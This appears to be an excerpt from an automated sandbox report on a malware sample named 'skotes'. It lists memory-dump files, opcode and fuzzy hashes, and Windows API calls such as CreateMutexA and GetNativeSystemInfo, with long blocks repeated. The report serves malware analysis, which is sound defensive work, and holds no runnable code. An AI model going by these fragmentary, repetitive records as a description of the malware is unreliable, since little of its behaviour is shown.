                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: 631fd37f72604d69a41fa1c936287f57367fcfb487c8b4c822727e43e05c6810
                                                                                                                                                                                                                                                                • Instruction ID: 02bf444e2a7f75fa53f32720b5b708503a7f6ccd50aa00482083e09ab36479ec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631fd37f72604d69a41fa1c936287f57367fcfb487c8b4c822727e43e05c6810
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5316D31B041008BEB18DBB8DDC97ADB7B6EFD6314F248618E015973D5DB359980C756
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA685
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: b39fcd440633914a0080ca9975209e68a1019de48b7f9d4d8945d11b9c7303c4
                                                                                                                                                                                                                                                                • Instruction ID: 70ae473bd3b4b8df7cb3752a76dffcffda1715aff8cd56c534d1a5584a7693d3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b39fcd440633914a0080ca9975209e68a1019de48b7f9d4d8945d11b9c7303c4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C3168317042009BEB18DB78DD89BAEB7F6EF96314F248218E014D73D6D73A9980C792
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA7BA
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: 4b1c839474fcfe013299b690f6331328ca82387500c6bfe180bcf4643a34f186
                                                                                                                                                                                                                                                                • Instruction ID: 747f13406fcd0739a3695d8363978cd83ac9f900ed7c3f8f529d540d3d074e93
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b1c839474fcfe013299b690f6331328ca82387500c6bfe180bcf4643a34f186
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3313731B042049BEB18DB78DE89BAEB7B6EF96314F248218E014D72D5D73A9981C752
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AA8524
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                • String ID: hf
                                                                                                                                                                                                                                                                • API String ID: 1721193555-3670292298
                                                                                                                                                                                                                                                                • Opcode ID: dc648654a1c4c81e982ad361b4256bba48d94760f2efc4ac58dafbcaf3e7bf89
                                                                                                                                                                                                                                                                • Instruction ID: a482ada96635193a4f50f3fcb73955d6784dc76420660cb100e19d85349236fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc648654a1c4c81e982ad361b4256bba48d94760f2efc4ac58dafbcaf3e7bf89
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7513970D142199BDB24EF78CE457DDB775EB46710F5042A8E804A72C1EF389E848B91
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
